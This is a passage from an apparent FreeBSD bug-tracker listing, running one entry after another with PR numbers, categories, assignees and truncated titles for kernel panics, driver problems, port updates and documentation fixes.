64-bit panics at boot time duri o usb/128977 usb [usb] [patch] uaudio is not full duplex o ports/128972 cy Port security/krb5 has a linking problem when compiled o bin/128954 net ifconfig(8) deletes valid routes o ports/128952 apache [NEW PORT] java/javadb: Sun's supported distribution o o java/128948 java java/jdk16 built from source can't bind a socket, but o www/128943 www dmesg output for ASUS M3A79-T running FreeBSD-7.1-PRER o kern/128933 [libc] realpath(3) does not follow SUS specification f o threa/128922 threads threads hang with xorg running o kern/128917 net [wpi] [panic] if_wpi and wpa+tkip causing kernel panic o bin/128886 ntpd(8): ntpd -L flag doesn't work o kern/128884 net [msk] if_msk page fault while in kernel mode o ports/128881 sem ports-mgmt/portupgrade backtrace o conf/128874 [termcap] termcap entry for rxvt missing :AX: capabili o kern/128870 [pccbb] Interrupt Storm when plugging in PCMCIA Card ( p bin/128842 attilio ps(1) command output includes thread name only when it p bin/128841 attilio ps(1) PADDR (and others?) field width insufficient for o kern/128840 net [igb] page fault under load with igb/LRO o ports/128838 des [PATCH] www/varnish 2.0.1 enhancements f kern/128829 fs smbd(8) causes periodic panic on 7-RELEASE o amd64/128810 amd64 AMD 64 port installation o java/128809 java JVM aborted when GNU RXTX write to serial port. o usb/128803 usb [usbdevs] [patch] Quirk for I-Tuner Networks USBLCD4X2 o ports/128787 doceng print/ghostscript8 8.63 fails with -sDEVICE=ijs -sIjsS o ports/128783 stas net-mgmt/flow-tools: flow-send Does not work on freebs o ports/128782 ume [PATCH] mail/cyrus-imapd23 2.3.13 o docs/128768 delphij Missing documentation about tmpfs mount options o amd64/128765 amd64 [install] Install CD loads to Install choices but stop p usb/128760 cperciva [ums] [patch] patch for Microsoft Comfort Optical Mous o ports/128754 portmgr bsd.port.mk: implement master sites randomization f usb/128745 weongyo zyd teoretically supported usb device makes kernel pan o bin/128727 host(1) does not work properly with the -6 option o ports/128726 mi [NEW PORT] print/lyx16: Document processor interfaced o bin/128725 [patch] whois(1) does not correctly send queries regar o kern/128714 gmtime(3) infine loop o docs/128711 blackend Re: [patch] for handbook browsers page o ports/128696 nobutaka Update textproc/uim and new package request textproc/u f ports/128694 gecko www/firefox3 - Firefox 3 corrupts PostScript printer f o kern/128689 [panic] www/apache22: Fatal trap 12: page fault while o amd64/128686 amd64 [ata] can't detect SATA Disk on 8.0-Current with NF550 o bin/128668 [request] Kerberos in the base system is too old o bin/128654 atacontrol(8) does not preserve rebuild status through o kern/128648 [drm] [hang] crash when using 3D-acceleration with Int o gnu/128645 [patch] grep(1): teach grep -r to how to ignore direct f kern/128639 acpi [patch] [acpi_asus] acpi for ASUS A6F,A3E,A3F,A3N not f kern/128634 acpi [patch] fix acpi_asus(4) in asus a6f laptop o kern/128633 fs [zfs] [lor] lock order reversal in zfs o conf/128632 security periodic 700.kernelmsg repeats messages p bin/128616 kientzle [patch] bsdtar(1) error message typo p misc/128610 kensmith [patch] /usr/src: the iso.1 target of make release do o kern/128608 [pccbb] [patch] add support for powering down and up C o bin/128605 secteam [patch] dhclient(8) - security issue o ports/128603 [patch] textproc/flex has too small capacity o bin/128602 net [an] wpa_supplicant(8) crashes with an(4) o kern/128598 net [bluetooth] WARNING: attempt to net_add_domain(bluetoo o bin/128587 kensmith [patch] sysinstall(8) uses first mirror in Turkey even o bin/128582 [patch] wpa_cli(8): activate readline(3) support o kern/128577 [ixgbe] [patch] Send queue stall in ixgbe driver when o bin/128561 kientzle [patch] compile warning fixes for bsdtar test harness o ports/128556 mnag net/py-zsi installs with insufficient rights o stand/128546 standards ls -p does not follow symlinks o docs/128524 doc No geom documentation for loading gjournal(8) f ports/128522 stas Patch for graphics/lcms to add python binding f misc/128516 [build] /usr/src: "make doxygen" stops with error: mak o kern/128514 fs [zfs] [mpt] problems with ZFS and LSILogic SAS/SATA Ad o bin/128501 cperciva freebsd-update(8) does not work on netbooted machines o bin/128493 [patch] find(1) exits if -fstype test fails with EACCE o usb/128485 usb [umodem] [patch] Nokia N80 modem support o ports/128467 ale [patch] databases/php4-dba: change Berkeley DB detecti o bin/128465 [request] mount_smbfs(8) does not support IPv6 o kern/128452 scsi [sa] [panic] Accessing SCSI tape drive randomly crashe o kern/128448 net [nfs] 6.4-RC1 Boot Fails if NFS Hostname cannot be res o misc/128444 [build] [patch] create USB stick install image o conf/128433 [patch] Add option to allow a full login when doing 's o conf/128429 dougb Permissions of bind9 chroot 'master' directory o bin/128427 [patch] mdfs(8): mount_mfs warns "chmod: Read-only fil o usb/128425 usb [umass] Cannot Connect Maxtor Onetouch 4 USB drive f usb/128418 usb [panic] [rum] loading if_rum causes panic, looks like o java/128411 glewis jdk1.5 Querying JMX mbean OperatingSystem->TotalPhysic o bin/128398 geom [patch] glabel(8): teach geom_label to recognise gpt l o docs/128356 doc [request] add Firefox plugin for FreeBSD manual pages o kern/128335 [patch] [cpufreq] Missing call to sbuf_delete() in two o conf/128334 net [request] use wpa_cli in the "WPA DHCP" situation o docs/128325 mckusick README.snapshots still refers to snaphots as "alpha-te o usb/128324 usb [uplcom] [patch] remove baud rate restriction for PL23 f bin/128312 vwe netstat(1): output field "Netif" too small f kern/128308 gavin [psm] psm0 cause page fault o kern/128304 vn_pollrecord(3) derefs NULL if v_addpollinfo() fails o conf/128299 rc [patch] /etc/rc.d/geli does not mount partitions using o bin/128295 net [patch] ifconfig(8) does not print TOE4 or TOE6 capabi o kern/128287 remko re(4) regression in 7.1 BETA2 o gnu/128284 gdb(1) segfaults f kern/128282 gavin [mpt] system failure on removing two drives o bin/128277 [patch] improvements for fwcontrol(8) utility f kern/128276 geom [gmirror] machine lock up when gmirror module is used o amd64/128263 amd64 [panic] 2 amd64 dl380 g5 with dual quadcore xeons, 8 a o gnu/128262 [libgcc] [patch] contrib/gcclibs/libcpp/errors.c: -Wmi o kern/128260 ipfw [ipfw] [patch] ipfw_divert damages IPv6 packets o amd64/128259 amd64 csh(1): "`" crashes csh o ports/128256 ale www/tomcat-native rewrites APR library distributed wit o ports/128250 pgollucci net-mgmt/net-snmp: pf (packet filter) support p kern/128247 bz [ip6] [panic] Fatal Trap 12 in ip6_forward = o kern/128245 scsi [scsi] "inquiry data fails comparison at DV1 step" [re p docs/128222 trhodes [patch] man page truss(1) claims that init(8) can be t f kern/128181 yongari [fxp] panic in fxp_add_rfabuf o threa/128180 attilio pthread_cond_broadcast(3) lost wakeup o kern/128177 jeff [sched_ule] wrong CPU usage reported by top/ps with SC f ports/128176 openoffice editors/openoffice.org-3 - 3.0.0 crash (macro security f kern/128173 fs [ext2fs] ls gives "Input/output error" on mounted ext3 o kern/128172 gavin [keyboard] Remote Console (Keyboard) of AOC-SIM1U+ not o kern/128165 [aac] [patch] sync aac(4) with the latest vendor versi o ports/128142 mi update net/ekiga to 3.0.0 to fit GNOME 2.24 o ports/128141 mi update net/opal to 3.4.1 to fit GNOME 2.24 o www/128113 www outdated port count graph in www.freebsd.org/ports o kern/128103 vwe [feature request] [patch] new SiS 190 NIC driver o bin/128096 bushman [patch] nscd(1): Failure in memset . o bin/128094 [patch] lint(1): Sizeof(pointer) bug in usr.bin/xlint/ o ports/128091 sobomax misc/zaptel drivers can't be used when asterisk runs a p docs/128089 kientzle [patch] Incorrect type in archive_write(3) manpage f bin/128088 vwe who(1) not listing all logged in users. o ports/128086 multimedia Add schroedinger (dirac) codec support for multimedia/ o kern/128083 [psm] [panic] early SMP panic on GA-G31M-S2L motherboa o ports/128078 apache www/apache20 -- LDAP support is broken o kern/128076 [panic] Fatal trap 12: page fault while in kernel mode o kern/128040 [pccbb] [patch] System hangs when PCMCIA-CF adapter pl o kern/128037 [pccbb] [patch] System hang on shutdown with PCMCIA-CF o kern/128036 [sio] [patch] serial console mostly ignores typein to o kern/128035 [ata] unexpexted detach of external SATA drive o docs/128032 jeff pthread(3) mentions libkse which has been removed in 8 s conf/128030 bz [ipsec] [request] Isn't it time to enable IPsec in GEN o ports/128028 portmgr bsd.port.mk - Ports-Script do not recognize dialog-ret o ports/128025 shaun [patch] security/heimdal ldap support broken under 7 o i386/128014 i386 [geode] [patch] AMD Geode CS5536 watchdog(9) not disab f kern/128009 vwe setkey(8) coredumps freebsd7 on sha1_result line 263 p o bin/128001 net wpa_supplicant(8), wlan(4), and wi(4) issues p ports/127995 jpaetzel net/isc-dhcp30-server creates a user/group with dynami p bin/127986 [patch] ee(1): fix compiler warnings caused by use of o ports/127982 amdmi3 games/tnl: crashes when clicking on `single mission' i o i386/127981 i386 [loader] Stack underflow preventing boot [regression] o usb/127980 usb [umass] [patch] Fix Samsung YP U2 MP3 player on 7.x an o kern/127971 [panic] 7.0 RELEASE PANIC o bin/127932 [patch] mkdir(1): mkdir -p PATH fails if a directory i o kern/127930 ed auto-logout does not work o kern/127928 net [tcp] [patch] TCP bandwidth gets squeezed every time t o kern/127927 scsi [isp] isp(4) target driver crashes kernel when set up o usb/127926 usb [boot] USB Timeout during bootup o docs/127923 loader Please mention qemu in the FreeBSD Handbook o kern/127920 pf [pf] ipv6 and synproxy don't play well together o bin/127918 [patch] ATA Security support for atacontrol(8) o conf/127917 rc [patch] dumpon rejects on start with physmem>swap even o bin/127912 In theory, uncompress(1) may crash and SEGV f kern/127910 vwe [nfe] FBSD-7.0 amd64 nfe ethernet not completely worki o docs/127908 doc [patch] readdir(3) error documentation o www/127898 bugmeister [patch] query-pr.cgi: properly treat quoted-printable p docs/127890 trhodes socket(2) man page should explain that protocol can be o ports/127889 sem ports-mgmt/portupgrade detects spurious failures and s o kern/127887 [psm] PSM0 not detected by the KERNEL in Compaq Prolia o bin/127872 [libc] [patch] Rewinding on unionfs and Subversion o kern/127870 [panic] HP DL320 lockup with kernel panic s docs/127844 doc Example code skeleton_capture_n.c in meteor(4) manpage o docs/127842 murray list of hardware devices missing from the relnotes p docs/127840 murray [patch] fix entity references in release/doc/en_US.ISO o kern/127834 net [ixgbe] [patch] wrong error counting o bin/127832 mux csup(1) is reporting RCS errors in ports. o kern/127826 net [iwi] iwi0 driver has reduced performance and connecti s ports/127822 tmclaugh [PATCH] security/sudo: add tuneable variable SUDO_LDAP o kern/127815 net [gif] [patch] if_gif does not set vlan attributes from o conf/127814 pf [pf] The flush in pf_reload in /etc/rc.d/pf does not w f kern/127813 linimon [ata] ata diver dma mode work incorrectly on chip vt82 o kern/127787 [lor] 3 lock LOR in recent CURRENT f ports/127778 brooks lang/llvm-gcc4: llvm can't create shared lib o bin/127764 [boot0cfg] [patch] preserve NT disk UID data for boot0 p misc/127759 edwin [nanobsd] [patch] nanobsd.sh incorrectly calculates pa o ports/127728 ports/games/freebsd-games doesn't build, and larn(6) s o kern/127724 net [rtalloc] rtfree: 0xc5a8f870 has 1 refs f bin/127719 net [arp] arp: Segmentation fault (core dumped) o ports/127718 brooks [patch] devel/llvm: use PIC on amd64 and add optional o kern/127717 [ata] [patch] - support write cache toggling per devic o bin/127711 sysinstall(8): cant excape from failed distribution ft o ports/127672 multimedia multimedia/transcode won't compile with ImageMagick in o kern/127659 fs [tmpfs] tmpfs memory leak p kern/127644 weongyo [ndis] [panic] NDIS panic o amd64/127640 amd64 gcc(1) will not build shared libraries with -fprofile- o ports/127636 mnag [PATCH] www/lighttpd: lighttpd dir_favicon o bin/127633 edwin [patch] Update top(1) to 3.8b1 o kern/127623 [headers] header definition for cftime is missing. s ports/127608 marius [patch] sysutils/cdrtools - cdrecord: fix device enume p docs/127602 trhodes [patch] Incomplete information in nsswitch.conf(5) s kern/127587 net [bge] [request] if_bge(4) doesn't support BCM576X fami o kern/127581 acpi [patch] [acpi_sony] Add support for more Sony features o kern/127553 [build] (errata) in kernel generic et al, device ural o misc/127550 [tools] [patch] src/tools/tools/editing/freebsd.vim im s usb/127549 usb [umass] [patch] Meizu MiniPlayer M6 (SL) requires some o usb/127543 n_hibma [patch] [ubsa] Support Option Globetrotter HSDPA modem o bin/127532 [patch] install(1): install -S Not Safe in Jail with s f kern/127528 net [icmp]: icmp socket receives icmp replies not owned by f kern/127517 [ata] sata does not detect SATA-300 disk but instead d f ports/127499 mi [PATCH] Update devel/icu to 4.0 o www/127497 www new entry to FreeBSD/amd64 Project -- motherboards a ports/127496 mi devel/icu 3.8.1_1 does not build when Danish locale is o kern/127492 fs [zfs] System hang on ZFS input-output o kern/127486 [smp] [panic] early SMP panic ("AP #1 (PHY #1) failed! o amd64/127484 amd64 [timecounters] Drift problem with FreeBSD 7.0 and 7.1 o bin/127475 [patch] sockstat(1) output columns run into each other o misc/127471 [build] [patch] installworld fails if install-info is s ports/127469 portmgr bsd.port.mk - ports system does not honour NO_MANCOMPR o ports/127467 portmgr bsd.port.mk: fix checking DISTDIR for writeability s usb/127453 usb [request] ubsa, uark, ubser, uftdi, and friends should o amd64/127451 amd64 [scheduler] incorrect load on quad core p kern/127446 emax [kbdmux] [patch] fix race in sys/dev/kbdmux/kbdmux.c o kern/127441 jb [dtrace] Dtrace timestamp variable is wrapping as if d o kern/127440 jb [dtrace] Dtrace arg0/arg1 variables don't contain retu o kern/127439 pf [pf] deadlock in pf o ports/127435 mnag [patch] www/lighttpd mod_deflate patch for freebsd p docs/127432 remko [patch] update fsck_ffs(8) man-page with regarding to o usb/127423 usb [boot] BTX halted on Gigabyte GA-MA69VM-S2 / AMD Sempr o kern/127420 fs [gjournal] [panic] Journal overflow on gmirrored gjour p kern/127411 [ata] [panic] ata panics on bad block p docs/127406 n_hibma [patch] update umodem man page: Sony Ericsson W810i o amd64/127397 amd64 [amd64] 32bit application on FreeBSD-6.3 amd64 gets SI o kern/127391 [ata] [patch] Intel 6300ESB SATA150 cannot find disk a o i386/127387 kib [i386] [patch] Inline assembler in x86 _start() in crt f kern/127375 kmacy [zfs] If vm.kmem_size_max>"1073741823" then write spee o i386/127374 i386 Suspend/Resume with Keystroke only once on Thinkpad T4 p i386/127367 delphij [vesa] [patch] Improve VESA support for Parallels (pat o kern/127360 kmacy [socket] TOE socket options missing from sosetopt() o docs/127359 keramida Undocumented firewall_xxx options for rc.conf in stabl f kern/127345 pf [pf] Problem with PF on FreeBSD7.0 [regression] o i386/127343 i386 [hang] System locks -- simular to PR 123729 o usb/127342 usb [boot] [panic] enabling usb keyboard and mouse support o i386/127337 i386 [boot] FreeBSD 7.1/i386 BTX boot problem on Pavilion d a bin/127331 edwin [patch] top(1) only shows cputime used by one process o ports/127321 japanese/kon2-16dot: buffer overflow and mouse bugs o ports/127319 dougb [PATCH] ports-mgmt/portmaster - add completion for zsh o kern/127316 [ata] non aligned DMA transfer errors when using growi o ports/127304 markm lang/gcl is not broken now o ports/127303 kuriyama [patch] misc/amanda-server Add pkg-install to create m o ports/127292 timur net/samba3: not work cancel inheritance on share p kern/127289 [ata] [patch] new pci ids for SiI3132 present on adapt o ports/127286 linimon update to makeduds script to annotate why packages wer o bin/127280 des [libfetch] [patch] fetch/libfetch RFC 1738 %2F escaped s amd64/127276 amd64 ldd(1) invokes linux yes o bin/127270 fsck_msdosfs(8) may crash if BytesPerSec is zero o bin/127265 [patch] ddb(4): Adding the ddb command set from module o ports/127262 skv lang/php5: fbclient crashes php engine [regression] o docs/127253 gavin Error in Handbook: http://www.freebsd.org/doc/en/books p kern/127250 [ata] Kerneltrap 12 with atacontrol o usb/127248 usb [ucom] panic while uplcom devices attaach and detach o kern/127233 darrenr [ipnat]: ipnat + ipfilter source routing not handling o kern/127230 ipfw [ipfw] [patch] Feature request to add UID and/or GID l s ports/127229 lwhsu [PATCH] sysutils/dtc: unbreak, fix some typos, remove o threa/127225 threads bug in lib/libthr/thread/thr_init.c o kern/127222 usb [ohci]: Regression in 7.0 usb storage generic driver o ports/127214 secteam [PATCH] ports-mgmt/portaudit: Please change to U o kern/127213 fs [tmpfs] sendfile on tmpfs data corruption o ports/127210 portmgr bsd.destdir.mk - chrooted install of a port does not f o kern/127209 ipfw [ipfw] IPFW table become corrupted after many changes o bin/127192 net routed(8) removes the secondary alias IP of interface o ports/127181 audio/musicpd logs warning o ports/127154 danfe missing dependency for audio/rezound f kern/127145 net [wi]: prism (wi) driver crash at bigger traffic o gnu/127136 Typo in tree-nested.c o ports/127132 anray mail/vm needs updated to version 8.0.* o kern/127131 multimedia [bktr] /usr/src/sys/dev/bktr/bktr_os.c, line 469: wron o amd64/127129 amd64 mdconfig(8) is core dumping with Segmentation Fault 11 o kern/127121 pf [pf] [patch] pf incorrect log priority f kern/127119 [ata] incorrect ata device probing o kern/127109 [mpt]: FreeBSD fails to boot except in safe mode o ports/127104 skv devel/otrs - OTRS/PostgreSQL 8.3.3 error: Syntax error o kern/127102 net [wpi] Intel 3945ABG low throughput o bin/127095 mux csup(1): Csup truncates files using RELENG_6 s ports/127087 mail/bincimap port does not include an rc.d file o ports/127084 multimedia multimedia/linux-realplayer is vulnerable o kern/127057 net [udp] Unable to send UDP packet via IPv6 socket to IPv s bin/127056 lp(1) doesn't use -o options f sparc/127051 sparc64 [hme] hme interfaces "pause" with the message "device o kern/127050 net [carp] ipv6 does not work on carp interfaces [regressi o kern/127048 systat(1) information leak when security.bsd.see_other o bin/127045 julian setfib(1) coredumps if called with fib value out of ra o kern/127042 pf [pf] [patch] pf recursion panic if interface group is p kern/127040 davidxu [patch] mqueuefs(5) witness panic o bin/127034 [patch] Add option to count apparent size to du(1) o kern/127029 fs [panic] mount(8): trying to mount a write protected zi o ports/127019 sem ports-mgmt/portupgrade does not recognize fail conditi f ports/127018 emulation Linuxulator incapable of using FreeBSD's LDAP environm o ports/127017 sysutils/ntfsprogs - ntfsclone not working version 2.0 f kern/126984 glebius [carp] [patch] add carp userland notifications via dev o kern/126973 daichi [unionfs] [hang] System hang with unionfs and init chr o kern/126971 [boot] loader/kernel does not obey comconsole_speed o conf/126946 [patch] Add OpenVPN ports to services(5) o kern/126945 net [carp] CARP interface destruction with ifconfig destro o kern/126937 rnoland [drm] System hang when start X o bin/126936 locate.updatedb(8): updatedb fails silently when attem p docs/126934 trhodes missing 'crit' in usr.sbin/syslogd/syslog.conf.5 s ports/126932 itetcu gapcmon option in sysutils/apcupsd conflicts with sysu o kern/126926 [build] [patch] Add MACHINE to dmesg o kern/126924 net [an] [patch] printf -> device_printf and simplify prob o kern/126902 geom [geom] geom_label: kernel panic during install boot o kern/126895 net [patch] [ral] Add antenna selection (marked as TBD) o usb/126884 usb [ugen] [patch] Bug in buffer handling in ugen.c o kern/126874 net [vlan]: Zebra problem if ifconfig vlanX destroy o kern/126866 scsi [isp] [panic] kernel panic on card initialization o kern/126861 [panic] 6.2 (SMP) crashes when polling disabled o ports/126853 secteam ports-mgmt/portaudit: speed up audit of installed pack f usb/126848 usb [usb]: USB Keyboard hangs during Installation p conf/126841 philip [syscons] [patch] Add eee900 keyboard layout to /usr/s p conf/126829 matteo gjournal not in /boot/defaults/loader.conf o ports/126826 thierry sysutils/xvidcap failes to build o bin/126822 net wpa_supplicant(8): WPA PSK does not work in adhoc mode o kern/126821 [panic] Fatal trap 12 (kdeinit) o bin/126819 randi sysinstall(8) During install if initial name look-up f f ports/126812 x11 x11-drivers/xf86-video-ati - System freeze when exitin o kern/126807 [ata] PATA DVD drive attached to AMD IXP700 chipset no o kern/126788 [boot] Can not boot FreeBSDv7.0.iso from USB formated o kern/126784 [agp] agp.ko doesn't detect Acer Aspire One onboard gr o ports/126760 danfe [update] audio/gtkpod - has additional dependencies o misc/126747 [build] bsd.dep.mk does not remove .depend on cleandep o usb/126740 usb [ulpt] doesn't work on 7.0-RELEASE, 10 second stall be o bin/126721 gcc(1) g++(1) Compiling, assembling and linking code w o kern/126714 net [carp] CARP interface renaming makes system no longer f kern/126703 kmacy [panic] [zfs] _mtx_lock_sleep: recursed on non-recursi o kern/126697 emaste [aac] aac driver bug. aaccli still doesn't work o kern/126695 net rtfree messages and network disruption upon use of if_ o kern/126688 net [ixgbe] [patch] 1.4.7 ixgbe driver panic with 4GB and p bin/126682 delphij [patch] sed(1) segfaults on error rather than error me o ports/126668 multimedia [patch] multimedia/ffmpeg - quick and dirty symbol bui o i386/126666 i386 [boot] [hang] boot failure for nForce 630i / GeForce 7 f kern/126665 yongari [vr] Integrated VIA Rhine II receive errors o ports/126664 roam mail/vpopmail - Failure to upgrade to courier-0.54.0_1 p bin/126657 [patch] w(1) breaks multibyte date format o ports/126656 danfe [update] audio/libgpod - add option to build SysInfo d s kern/126620 [request] RTL8187B Driver for freebsd o bin/126619 randi sysinstall(8) deletion of routes when reinitializing m f www/126617 jkois Commercial vendory entry addition request o docs/126590 doc [patch] Write routine called forever in Sample Echo Ps o bin/126562 rc rcorder(8) fails to run unrelated startup scripts when o kern/126553 daichi [unionfs] unionfs move directory problem 2 (files appe o bin/126546 des pam_nologin(8) in auth causes log spam o ports/126534 perky [Update]databases/py-rrdtool_lgpl:update to 1.0b1 o usb/126519 usb [usb] [panic] panic when plugging in an iphone o ports/126513 doceng print/ghostscript8 (was ghostscript-gpl): compile bug p docs/126487 keramida fix language on atol(3) manpage o docs/126484 doc libc function res-zonscut2 is not documented o kern/126475 net [ath] [panic] ath pcmcia card inevitably panics under f kern/126469 yongari [fxp] [panic] fxp(4) related kernel panic p bin/126468 bz [ipsec] some ipsec configurations make FreeBSD panic p docs/126451 delphij Exit status of nc(1) is not documented a bin/126446 secteam Vulnerability about OpenSSL p misc/126435 ed [patch] /usr/share/examples/drivers/make_pseudo_driver o bin/126433 [patch] some missing checks in rm(1) o kern/126419 [ar] Fails to boot from RAID10 volume under the Intel o kern/126396 usb [panic] kernel panic after unplug USB Bluetooth device o conf/126392 rc [patch] rc.conf ifconfig_xx keywords cannot be escaped o bin/126384 [request] find(1) doesn't support whiteout entries yet p kern/126368 bz [jail] Running ktrace/kdump in jail leads to stale jai o kern/126364 [panic] Fatal trap 12: page fault while in kernel mode o kern/126339 net [ipw] ipw driver drops the connection o bin/126324 rc [patch] rc.d/tmp: Prevent mounting /tmp in second tim o misc/126312 [build] debug message going to stderr while doing "mak o ports/126309 sobomax /usr/ports/misc/zaptel driver dont support the TE122 o bin/126307 syrinx bsnmpd(1): UNIX socket leak on 6.3 when using Hostres- o conf/126305 nsmb.conf(5): Hostnames in nsmb.conf seem to be ignore o ports/126303 dougb Make it easy to change FD_SETSIZE while building dns/b o bin/126301 pkg_version(1) can induce unexpected parsing of INDEX o kern/126300 [build] [patch] Add missing -mno-sse3 flag for AMD64 t o kern/126289 [libc] select(2) apparently consumes cpu when it shoul o kern/126287 fs [ufs] [panic] Kernel panics while mounting an UFS file o kern/126242 [ata] Read error from SATA CD/DVD-drives [regression] o kern/126232 emulation [linux] Linux ioctl TCGETS (0x5401) always fails o misc/126230 weird process cpu usage stats and weird load average p docs/126227 trhodes [patch] kthread(9) refers to non-existent manpage, des o kern/126214 net [ath] txpower problem with Atheros wifi card o i386/126162 i386 [acpi] ACPI autoload failed : loading required module o kern/126142 [ata] M5281: READ DMA faults, device detaching o ports/126140 sem ports-mgmt/portupgrade runtime error o misc/126131 cperciva portsnap(8) fetch error with HTTP_PROXY or HTTP_PROXY_ o kern/126113 rnoland [drm] Issues with DRM with Intel GM965 chipset o kern/126098 [cy] 6.3 only sees 16 ports on 32 port Cyclades Cyclom f kern/126089 [panic] Fatal trap 12: page fault while in kernel mode o ports/126085 shaun news/inn update make environment to allow for Berkeley o ports/126083 thierry textproc/aspell core dumps f ports/126079 portmgr [patch] bsd.port.mk: make openssl.mk usable after pre. o kern/126076 [headers] POLL_ERR and POLL_HUP are defined identicall o kern/126075 net [inet] [patch] internet control accesses beyond end of f ports/126043 multimedia multimedia/ffmpeg: ffplay returns Undefined symbol "pt f ports/126042 mi audio/festival: add OGI option o ports/126020 multimedia multimedia/transcode depends on wrong version of lzo o ports/126019 multimedia [patch] multimedia/transcode patch revision o ports/126012 portmgr [NEW PORT]: wxHaskell ports f ports/125996 danfe [patch] x11/nvidia-driver - remove pkg_info statements f kern/125985 [umass] [panic] no da-device, panic upon unplugging o ports/125936 sem ports-mgmt/portupgrade -R fails if BUILD_DEP's are not o bin/125932 pkg_add(1) doesn't prompt for root credentials and the o bin/125922 net [patch] Deadlock in arp(8) o docs/125921 doc lpd(8) talks about blocks in minfree while it is KB in o kern/125920 net [arp] Kernel Routing Table loses Ethernet Link status o kern/125895 [panic] kernel: panic: ffs_blkfree: freeing free block o ports/125883 x11 x11-fonts/xorg-fonts-cyrillic is installed, but fonts f i386/125880 i386 [cardbus] Cardbus cards Don't function on TI PCIxx12 C p bin/125878 kmacy [patch] [request] Add zfs/zpool to rescue programs. o amd64/125873 amd64 [smbd] [panic] Repeated kernel panics, trap 12 page fa o kern/125859 [ata] [patch] sata access failure [regression] o bin/125855 standards sh(1) allows for multiline, non-escaped control struct o kern/125845 net [netinet] [patch] tcp_lro_rx() should make use of hard o ports/125823 sem [PATCH] ports-mgmt/portupgrade does not use custom ECH o kern/125816 net [carp] [if_bridge] carp stuck in init when using bridg o kern/125808 rnoland [drm] [patch] Radeon X800 GTO - *ERROR* Offset failed o kern/125806 kmacy [cxgb] cxgb packet counters do not work o kern/125771 dougb bind(2) in base system incorrectly sets AD bit even wh o kern/125769 [ses] [panic] getencstat(8) panics system with "Sleepi o kern/125759 [ar] Fatal Trap 12 when ICH9R RAID becomes degraded s kern/125756 multimedia [sound] [patch] cannot detect soft-modem on HDA bus f bin/125753 cron(8) not mailing output o docs/125751 doc man 3 pthread_getschedparam section ERRORS incomplete s kern/125738 fs [zfs] [request] SHA256 acceleration in ZFS o usb/125736 usb [ukbd] [hang] system hangs after AT keyboard detect if o kern/125723 [ciss] System randomly crashes or can not boot - ciss o kern/125722 [boot] [install] error "BTX halted" at installation Fr o kern/125721 [ath] Terrible throughput/high ping latency with Ubiqu o ports/125719 skreuzer shells/pdksh, zombie process's occouring on SMP Machin o docs/125717 keramida minor wpa_supplicant.conf(5) buglet o kern/125710 [vga] Dragon_Saver Error 19 Freebsd 7.0 AMD64 o bin/125707 [patch] powerd(8): force a method of battery state que o kern/125704 [ng_nat] kernel libalias: repeatable panic o bin/125678 [patch] ls(1) -h option doesn't work if the listing co o kern/125675 [keyboard] [patch] Add hw.syscons.kbd_suspend new sysc p kern/125673 firewire [firewire] [panic] FreeBSD7 panics when kldunloading f o ports/125655 mbr Incorrect startup variable in mail/up-imapproxy rc.d/i o kern/125647 [ciss] [panic] System randomly crashes - ciss driver o kern/125644 fs [zfs] [panic] zfs unfixable fs errors caused panic whe p docs/125639 trhodes [patch] kldunloadf(2) does not mention about possible o usb/125631 usb [ums] [panic] kernel panic during bootup while 'Logite o kern/125617 [ath] ath(4) related panic a kern/125613 rwatson [ufs] [patch] ACL problems with special files o i386/125592 i386 [hang] FreeBSD 7 server in hang o java/125583 java Java gui programs stop without error message o conf/125551 [patch] building WLAN userland should be optional f kern/125536 fs [ext2fs] ext 2 mounts cleanly but fails on commands li o i386/125516 gavin [install] 7.0-RELEASE install dies o usb/125510 usb [panic] repeated plug and unplug of USB mass storage d f kern/125502 net [ral] ifconfig ral0 scan produces no output unless in o kern/125501 [ath] atheros cardbus driver hangs o kern/125496 [ar] [patch] free memory on ataraid module unload o kern/125467 pf [pf] pf keep state bug while handling sessions between o kern/125454 [digi] [patch] device digi (PC/Xe 64K 16 ports) not wo f ports/125453 cy net/ntp should no longer use mlockall() o usb/125450 usb [panic] Removing USB flash card while being accessed c o bin/125449 [patch] awk(1): /usr/bin/awk fails mawk's FPE test f kern/125442 gonzo [carp] [lagg] CARP combined with LAGG causes system pa f kern/125413 kmacy [zfs] [panic] Panic when doing zfs raidz with gmirror o kern/125389 [ipmi] [bce] IPMI problem with bce o i386/125383 i386 [amdtemp] [request] please enable amdtemp on i386 o kern/125382 [libc] open(2): ENOSPC may be misleading, consider EIO o bin/125370 ipfw [ipfw] [patch] increase a line buffer limit o bin/125365 matteo [patch] mdconfig(8) -l overflow for size field f kern/125358 linimon [zfs] missing .. link in zfs snapshot o kern/125356 [kqueue] [panic] Repeated panic in kqueue_close from k o bin/125350 des [libfetch] [patch] src/lib/libfetch add support for de o kern/125332 [ath] [hang] crash under any non-tiny networking under a ports/125330 dinoex print/cups-base update fails when nscd running o docs/125329 keramida PACKAGEROOT should be documented in the Handbook o bin/125325 Annoying grep(1) bug with --color s ports/125324 editors/the (3.2) looses cursor when compiled with PDC o usb/125264 usb [patch] sysctl for set usb mouse rate (very useful for o kern/125258 net [socket] socket's SO_REUSEADDR option does not work p docs/125253 trhodes [patch] jail(2) does not mention about possible error o kern/125251 [panic] kernel panic o kern/125239 net [gre] kernel crash when using gre o usb/125238 usb [ums] Habu Mouse turns off in X f kern/125195 yongari [fxp] fxp(4) driver failed to initialize device Intel o bin/125185 csh(1) exit on signal 11 o bin/125184 des sshd(8) does not always log IP address for login failu o ports/125183 apache www/apache22 wrong SUEXEC_DOCROOT p kern/125181 thompsa [ndis] [patch] with wep enters kdb.enter.unknown, pani p bin/125154 matteo [patch] mount(8) ignores values returned by exec_mount o kern/125149 fs [nfs] [panic] changing into .zfs dir from nfs client c a kern/125139 philip [patch] [ata] bugs in ATAPI CD tray control o ports/125113 des [Update]astro/openmap:update to 4.6.4 p bin/125098 [patch] ee(1) consume 100% cpu usage o usb/125088 usb [keyboard] Touchpad not detected on Adesso AKB-430UG U o ports/125045 ume [patch] mail/cyrus-imapd: add patch for autocreate INB o conf/125041 [patch] New file: /etc/periodic/security/810.loginok o misc/125039 cperciva Updating 7.0-RELEASE with freebsd-update failes o kern/125034 [devfs] [patch] devfs does not apply rules to newly cr o kern/125030 [devfs] [patch] Command 'devfs ruleset 0' causes panic o ports/125012 ahze problems in math/ldouble for 128bit long double on i38 o i386/125011 i386 precision of constants for long double o kern/125009 [patch] access(2) grants root execute perms for non-ex p kern/125003 hrs [gif] incorrect EtherIP header format. o amd64/125002 amd64 [install] amd64, SATA hard disks not detected o kern/124996 [patch] "filesystem goof: 